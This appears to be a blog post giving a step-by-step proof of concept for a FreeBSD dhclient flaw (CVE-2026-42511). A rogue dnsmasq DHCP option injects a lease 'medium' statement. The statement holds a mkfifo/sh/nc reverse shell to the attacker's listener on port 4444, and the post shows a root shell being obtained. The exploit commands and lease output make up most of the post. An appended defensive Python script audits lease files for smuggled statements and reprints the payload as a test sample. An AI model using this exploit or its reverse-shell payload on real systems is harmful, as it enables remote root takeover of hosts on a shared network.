Monday, May 11, 2026

FreeBSD CVE-2026-42511 "DHCP" vulnerability test

Demo video:


Cause:


Proof-of-concept test:

On the same LAN, assume the attacker has already won the race against the legitimate DHCP server, so the victim receives a lease that carries malicious commands.
  • Attacker machine
    Run Dnsmasq as the DHCP server and put the malicious command into its configuration
    $ vi /etc/dnsmasq.d/poc.conf
    Embed a reverse-shell command
    dhcp-option= 67 , "\";\n medium \";/usr/bin/mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | /usr/bin/nc 192.168.10.10 4444 > /tmp/f"
    Restart Dnsmasq
    $ systemctl restart dnsmasq
    Listen on port 4444 and wait for the victim to connect
    $ nc -lvp 4444
  • Victim machine
    The lease renewal is triggered manually here instead of waiting for the automatic DHCP renewal.
    Check the FreeBSD version
    $ freebsd-version -kru
    15.0-RELEASE
    15.0-RELEASE
    15.0-RELEASE

    Look at the normal lease contents, without the malicious command
    $ cat /var/db/dhclient.leases.em1
    lease {
      interface "em1";
      fixed-address 192.168.10.142;
      next-server 192.168.10.10;
      option subnet-mask 255.255.255.0;
      option routers 192.168.10.1;
      option domain-name-servers 8.8.8.8;
      option host-name "test";
      option broadcast-address 192.168.10.255;
      option dhcp-lease-time 43200;
      option dhcp-message-type 5;
      option dhcp-server-identifier 192.168.10.10;
      option dhcp-renewal-time 21600;
      option dhcp-rebinding-time 37800;
      renew 1 2026/5/11 13:33:13;
      rebind 1 2026/5/11 18:03:13;
      expire 1 2026/5/11 19:33:13;
    }

    Obtain the lease contents that carry the malicious command
    $ rm /var/db/dhclient.leases.em1
    $ service dhclient restart em1
    $ cat /var/db/dhclient.leases.em1
    lease {
      interface "em1";
      fixed-address 192.168.10.142;
      next-server 192.168.10.10;
      filename "";
     medium ";/usr/bin/mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | /usr/bin/nc 192.168.10.10 4444 > /tmp/f";
      option subnet-mask 255.255.255.0;
      option routers 192.168.10.1;
      option domain-name-servers 8.8.8.8;
      option host-name "test";
      option broadcast-address 192.168.10.255;
      option dhcp-lease-time 43200;
      option dhcp-message-type 5;
      option dhcp-server-identifier 192.168.10.10;
      option dhcp-renewal-time 21600;
      option dhcp-rebinding-time 37800;
      renew 1 2026/5/11 13:36:05;
      rebind 1 2026/5/11 18:06:05;
      expire 1 2026/5/11 19:36:05;
    }

    Execute the malicious lease contents
    $ killall dhclient
    $ service dhclient start em1
  • On the attacker's listener on port 4444, a connection with root privileges is obtained
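A defender-side check, added here as an example (it is not part of the original post or of FreeBSD's dhclient): a small Python script that parses a dhclient lease file and flags anything a rogue server could have smuggled in through a string option, using the two lease files above as constructed samples. It assumes, which the page does not state, that a lease block on a host that does not use media selection should contain only the usual statement keywords (so a `medium` statement is treated as unexpected) and that no quoted lease value should contain shell metacharacters.

```python
"""Audit a FreeBSD dhclient lease file for statements smuggled in by a
rogue DHCP server, as in the option-67 lease shown in the write-up.

Added example for defenders; not part of the original post or of
FreeBSD's dhclient. Assumptions (not from the page): a lease block on a
host without media selection carries only EXPECTED_KEYWORDS, and no
quoted value contains shell metacharacters.
"""
import re
from typing import List, Tuple

# Statement keywords a normal lease block is expected to carry (assumption).
EXPECTED_KEYWORDS = {
    "interface", "fixed-address", "next-server", "filename",
    "server-name", "option", "renew", "rebind", "expire",
}

# Characters that should never appear inside a lease string value.
SHELL_META = set(";|&<>`$\n")

# Constructed samples, abridged from the two lease files in the write-up.
BENIGN_LEASE = """lease {
  interface "em1";
  fixed-address 192.168.10.142;
  next-server 192.168.10.10;
  option subnet-mask 255.255.255.0;
  option routers 192.168.10.1;
  option domain-name-servers 8.8.8.8;
  option host-name "test";
  option dhcp-server-identifier 192.168.10.10;
  renew 1 2026/5/11 13:33:13;
  rebind 1 2026/5/11 18:03:13;
  expire 1 2026/5/11 19:33:13;
}
"""

MALICIOUS_LEASE = """lease {
  interface "em1";
  fixed-address 192.168.10.142;
  next-server 192.168.10.10;
  filename "";
 medium ";/usr/bin/mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | /usr/bin/nc 192.168.10.10 4444 > /tmp/f";
  option subnet-mask 255.255.255.0;
  option routers 192.168.10.1;
  option domain-name-servers 8.8.8.8;
  option host-name "test";
  option dhcp-server-identifier 192.168.10.10;
  renew 1 2026/5/11 13:36:05;
  rebind 1 2026/5/11 18:06:05;
  expire 1 2026/5/11 19:36:05;
}
"""


def split_statements(block: str) -> List[str]:
    """Split a lease body into statements at ';' outside double quotes.

    Backslash escapes inside quotes are honoured, so a ';' hidden in a
    quoted value cannot end the statement early.
    """
    statements, buf, in_quote, escaped = [], [], False, False
    for ch in block:
        if escaped:
            escaped = False
        elif ch == "\\" and in_quote:
            escaped = True
        elif ch == '"':
            in_quote = not in_quote
        elif ch == ";" and not in_quote:
            if "".join(buf).strip():
                statements.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    if "".join(buf).strip():  # unterminated tail is still reported
        statements.append("".join(buf).strip())
    return statements


def lease_blocks(text: str) -> List[str]:
    """Return the bodies of all `lease { ... }` blocks in a leases file."""
    return re.findall(r"lease\s*\{(.*?)\}", text, flags=re.S)


def audit_lease_file(text: str) -> List[Tuple[str, str]]:
    """Return (reason, statement) findings; an empty list means clean."""
    findings = []
    for body in lease_blocks(text):
        for stmt in split_statements(body):
            keyword = stmt.split(None, 1)[0]
            if keyword not in EXPECTED_KEYWORDS:
                findings.append(("unexpected statement keyword", stmt))
            for value in re.findall(r'"((?:[^"\\]|\\.)*)"', stmt):
                if SHELL_META & set(value):
                    findings.append(("shell metacharacters in string value", stmt))
    return findings


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_LEASE), ("malicious", MALICIOUS_LEASE)):
        print(name, audit_lease_file(text) or "clean")
```

Pointed at `/var/db/dhclient.leases.em1` (or whichever interface's lease file applies), the same `audit_lease_file` call can run from a periodic job before `dhclient` is restarted; a non-empty result is a reason to inspect the file rather than let the lease be applied.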



References:

